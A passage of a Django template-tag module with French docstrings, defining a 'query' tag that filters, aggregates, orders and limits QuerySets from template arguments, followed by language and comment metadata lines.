Force ou non la localisation :return: Valeur localisée (si possible) """ return localize(value, use_l10n=use_l10n) or value @register.simple_tag(name='query', takes_context=True) def tag_query(context, queryset, save='', **kwargs): """ Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... :return: Rien """ from common.api.utils import url_value, AGGREGATES from django.db.models import F, QuerySet if not isinstance(queryset, QuerySet): return queryset # Fonction de récupération des données depuis les paramètres def get(name): return kwargs.get(name, '').replace('.', '__').replace(' ', '') reserved_keywords = ( 'filters', 'fields', 'order_by', 'group_by', 'distinct', 'select_related', 'prefetch_related', 'limit', ) + tuple(AGGREGATES.keys()) # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) def do_filter(queryset): filters = {} excludes = {} for key, value in kwargs.items(): if key in reserved_keywords: continue key = key.replace('.', '__') if isinstance(value, str) and value.startswith('(') and value.endswith(')'): value = F(value[1:-1]) if key.startswith('_'): key = key[1:] excludes[key] = url_value(key, value) else: key = key.strip() filters[key] = url_value(key, value) if filters: queryset = queryset.filter(**filters) if excludes: queryset = queryset.exclude(**excludes) # Filtres génériques others = kwargs.get('filters', None) if others: from common.api.utils import parse_filters queryset = queryset.filter(parse_filters(others)) return queryset # Jointures select_related = get('select_related') if select_related: queryset = queryset.select_related(*select_related.split(',')) prefetch_related = get('prefetch_related') if prefetch_related: queryset = queryset.prefetch_related(*prefetch_related.split(',')) # Aggregations aggregations = {} for aggregate, function in AGGREGATES.items(): for field in kwargs.get(aggregate, '').split(','): if not field: continue distinct = field.startswith(' ') field = field.strip().replace('.', '__') aggregations[field + '_' + aggregate] = function(field, distinct=distinct) group_by = get('group_by') if group_by: _queryset = queryset.values(*group_by.split(',')) if aggregations: _queryset = _queryset.annotate(**aggregations) else: _queryset = _queryset.distinct() queryset = _queryset elif aggregations: queryset = do_filter(queryset) # Filtres éventuels return queryset.aggregate(**aggregations) # Filtres queryset = do_filter(queryset) # Extraction de champs spécifiques fields = get('fields') if fields: # Supprime la récupération des relations queryset = queryset.select_related(None).prefetch_related(None) # Champs spécifiques relateds = set() field_names = set() for field in fields.split(','): if not field: continue field_names.add(field) *related, field_name = field.split('__') if related: relateds.add('__'.join(related)) if relateds: queryset = queryset.select_related(*relateds) if field_names: queryset = queryset.values_list(*field_names, named=True) # Tris order_by = get('order_by') if order_by: _queryset = queryset.order_by(*order_by.split(',')) str(_queryset.query) # Force SQL evaluation to retrieve exception queryset = _queryset # Distinct distinct = get('distinct') if distinct: if distinct is True: distincts = () else: distincts = distinct.split(',') queryset = queryset.distinct(*distincts) # Limite limit = get('limit') if limit: limit = [int(l) for l in limit.split(',')] limit_inf, limit_sup = (0, limit[0]) if len(limit) == 1 else limit[:2] queryset = queryset[limit_inf:limit_sup] context[save] = queryset return ''
fr
0.926917
# coding: utf-8 Récupération d'une métadonnée sur une instance :param key: Clé :return: Valeur Parse une date ou un datetime dans n'importe quel format :param value: Date ou datetime au format texte :param options: Options de parsing (au format query string) :return: Date ou datetime Permet de récupérer une valeur depuis un objet quelconque :param value: Objet :param key: Clé ou index :return: Valeur Localise une valeur brute :param value: Valeur :param use_l10n: Force ou non la localisation :return: Valeur localisée (si possible) Permet de faire des opérations complémentaires sur un QuerySet :param context: Contexte local :param queryset: QuerySet :param save: Nom du contexte qui contiendra le nouveau QuerySet :param kwargs: Options de filtre/tri/etc... :return: Rien # Fonction de récupération des données depuis les paramètres # Filtres (dans une fonction pour être appelé par les aggregations sans group_by) # Filtres génériques # Jointures # Aggregations # Filtres éventuels # Filtres # Extraction de champs spécifiques # Supprime la récupération des relations # Champs spécifiques # Tris # Force SQL evaluation to retrieve exception # Distinct # Limite
2.031891
2